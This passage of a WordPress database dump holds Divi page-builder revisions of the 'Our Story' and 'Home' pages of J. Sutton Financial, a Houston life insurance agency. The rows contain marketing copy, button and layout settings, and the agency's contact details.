</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 20:31:11','2023-04-02 20:31:11','',26,'http://cmdev-site1.com/?p=654',0,'revision','',0),(686,1,'2023-04-03 23:01:01','2023-04-03 23:01:01','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"|auto||12px||\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" global_colors_info=\"{}\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 23:01:01','2023-04-03 23:01:01','',138,'http://cmdev-site1.com/?p=686',0,'revision','',0),(675,3,'2023-04-03 13:35:26','2023-04-03 13:35:26','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" global_colors_info=\"{}\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2><strong>Want to know how much insurance you need?</strong></h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" 